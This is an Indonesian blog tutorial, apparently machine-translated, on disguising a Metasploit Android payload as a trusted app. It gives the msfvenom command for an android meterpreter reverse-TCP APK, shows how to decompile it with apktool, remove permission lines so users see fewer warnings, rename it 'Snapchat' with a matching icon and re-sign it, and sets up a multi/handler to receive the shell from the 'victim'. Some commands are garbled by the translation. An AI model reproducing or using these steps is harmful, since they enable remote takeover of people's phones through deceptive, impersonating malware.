Membuat Aplikasi Android Berbahaya Anda Menjadi Lebih Meyakinkan

Dalam tutorial singkat ini saya akan menunjukkan kepada Anda cara mengubah ikon, izin dan nama aplikasi agar lebih meyakinkan bagi korban Anda. Sesuatu yang bisa sangat relevan ketika Anda adalah seseorang yang memiliki Rekayasa Sosial.

Langkah 1Membuat Apk Malicious

Jadi mari kita mulai dengan membuat apk meterpreter kami. Masukkan kode ini di terminal

msfvenom -p android / meterpreter / membalikkan tcp LHOST = (ip Anda) LPORT = (port Anda) -o app.apk

Ini akan membuat app.apk di folder Anda saat ini.
Sekarang sampai pada bagian yang sulit.

Langkah 2Menginstal Apktool

Anda harus menginstal Apktool pada sistem Anda, saya menggunakan windows untuk ini tetapi harus dilakukan dengan cara yang sama di linux / mac os. Karena ini berbeda untuk semua orang maka saya tidak akan membahas menginstal alat ini. Lihatlah situs web mereka untuk sistem Anda.

Perhatikan bahwa Apktool diinstal secara default di toolkit rekayasa terbalik dari Kali linux!

Langkah 3Dekompilasi Apk Anda

Pertama periksa apakah Anda dapat menjalankan apktool dengan benar dengan menjalankan perintah:
apktool

Jika Anda mendapatkan menu bantuan, semuanya diinstal dengan benar. Sekarang jalankan perintah
apktool d /pathtoyourapk/app.apk / pathtoyourfolder / folder

apktool sekarang akan mendekompilasi app.apk ke / pathtoyourfolder / folder. Di folder baru ini Anda akan menemukan beberapa file. Paling mungkin:

Folder 'res'
File AndroidManifest.xml
Folder 'smali'
Folder 'asli'
File apktool.yml

Langkah 4Memodifikasi File

Untuk tutorial ini kita hanya akan memodifikasi file AndroidManifest.xml dan folder 'res'. Pertama, buka AndroidManifest.xml dengan editor teks pilihan Anda. Saya menggunakan Notepad ++.

Anda akan melihat sesuatu seperti ini:

Pertama, mari kita hapus beberapa baris yang mungkin tidak kita perlukan dan akan memberikan peringatan tambahan kepada pengguna.

Sekarang kita masuk ke folder 'res'. Di sini Anda akan menemukan folder 'nilai', masuk ke dalamnya. Sekarang Anda akan menemukan 2 file, 1 bernama strings.xml, sekali lagi, buka file xml ini dengan editor teks pilihan Anda.

Anda akan menemukan baris <string name = " name app "> MainActivity </string>

Ubah '' 'MainActivity' 'menjadi nama aplikasi yang Anda sukai, saya memilih nama' '' Snapchat ''. Tetapi pilihlah nama yang menurut Anda cocok untuk situasi Anda.

Simpan file dan kembali ke folder / res /.
Buat 3 folder bernama:

drawable-ldpi-v4
drawable-mdpi-v4
drawable-hdpi-v4

Sekarang Anda perlu menemukan ikon yang sesuai untuk aplikasi Anda.

Saya menggunakan Android Asset Studio situs web dan resizeimage.net

Tujuannya adalah untuk mendapatkan file 3 png dengan ukuran berikut:

36x36 (piksel) untuk folder ldpi
48x48 untuk folder mdpi
72x72 untuk folder hdpi

Beri nama file png ini semua 'icon.png' dan letakkan di folder yang sesuai.

Langkah 5Menyusun Aplikasi Anda

Proses ini sangat mudah. Kembali ke terminal apktool dan masukkan perintah berikut:
apktool b / pathtoyourfolder / folder
Ini akan membuat apk di folder 'dist' yang baru dibuat (ditemukan di apktool b / pathtoyourfolder / folder)

Langkah 6Menandatangani Apk

Saya di sini adalah zip yang digunakan untuk menandatangani tautan langsung utas asli atau jika itu tidak berfungsi tautan mega.co.nz ini . Unzip file dan cd ke folder baru, sekarang gunakan perintah:

java -jar signapk.jar Certificate.pem key.pk8 /pathtoyourapp/app.apk ditandatangani.apk

Ini akan membuat file bernama signed.apk di folder baru yang dapat Anda kirim ke korban dan mereka akan melihat nama dan ikon aplikasi yang dikenal.

Langkah 7Daftar untuk Koneksi

Sekarang bagian terakhir,
buka metasploit menggunakan:
msfconsole
Buka multi / handler
gunakan multi / handler
atur
set muatan payload
android / meterpreter / reverse tcp
set LHOST dan LPORT
atur LPORT (port Anda)
atur LHOST (host Anda)
dan exploit
exploit

Sekarang setelah membuka aplikasi maka Anda akan mendapatkan shell meterpreter yang masuk, manis kan?

Search This Blog

WeLcOmE TO My SiTeS